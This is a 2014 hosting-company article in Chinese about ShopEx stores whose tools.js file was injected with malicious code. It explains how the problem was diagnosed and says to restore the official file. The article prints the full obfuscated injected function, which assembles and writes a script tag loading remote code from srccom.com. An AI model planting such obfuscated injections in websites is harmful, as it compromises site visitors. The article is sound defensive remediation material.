新闻中心

2014最新ShopEx程序tools.js文件被挂马的解决方案

作者 / 无忧主机 时间 2014-03-31 21:07:58

大家都知道shopex是一款开源的程序。很多做电商的站长的朋友们都是使用的这个开源程序。但是开源的程序有很多bug,黑客就是瞅准了这些漏洞进行攻击。其中有一种,攻击的对象就是js文件。今天小编就遇到了一个站长朋友的网站受到这样的攻击。js文件里包含了恶意代码,从而触发了恶意访问请求。 无忧主机小编在分析客户网站访问时,发现网站加载特别慢,原因是加载了以下链接: srccom.com/SRC.SRC 而这个链接,单独访问是无法访问的。也就是说由于这个无法访问的链接程序一直在进行调用,但是调用失败出现pending响应返回,导致加载缓慢。根据链接调用分析,报错来自于tools.js文件。粗略查看程序发现tools.js中并没有恶意URL的关键字。无忧主机小编把客户的tools.js文件下载到本地,仔细对比shopex开源源码的tools.js,发现文件中被植入了一段恶意函数,函数代码如下:

function CurrentXmlFrmFocus(){

var arnElement=[2,9,3,8,2,8,7,5,4,3,10,5];

var arsOffset=[" ",":",".","/","<",">","=","'","CRS","MOC","TPIRCS","PTTH"];

var ardPopOpacity=[4,10,0,8,6,7,11,1,3,3,8,9];

var strgAttribute=”";

ardPopOpacity=ardPopOpacity.concat(arnElement);

for(var i=0;i<ardPopOpacity.length;i++) strgAttribute=strgAttribute+arsOffset[ardPopOpacity[i]].split(“”).reverse().join(“”);

document.writeln(strgAttribute);

}
具体的解决方案如下: 找到网站根目录下的statics/script/tools.js文件,使用shopex最新安装包中的JS文件上传替换它!   按照以上发法替换后,到网站后台更新下缓存就可以解决。最近shopex中此问题爆发比较频繁,希望此文能引起shopex站长们的重视,也希望这篇技术文章能帮到遇到同样问题的站长们。 相关文章推荐阅读: 解决SHOPEX添加商品无法上传商品图片的方法 SHOPEX去除底部版权信息“POWERED BY SHOPEX V4.8.5 ” 解决SHOPEX打开网页一直加载EC.PINGTCSS.QQ.COM的方法    

本文地址:https://www.51php.com/shopex/13741.html

1
1
1
1
1
1
1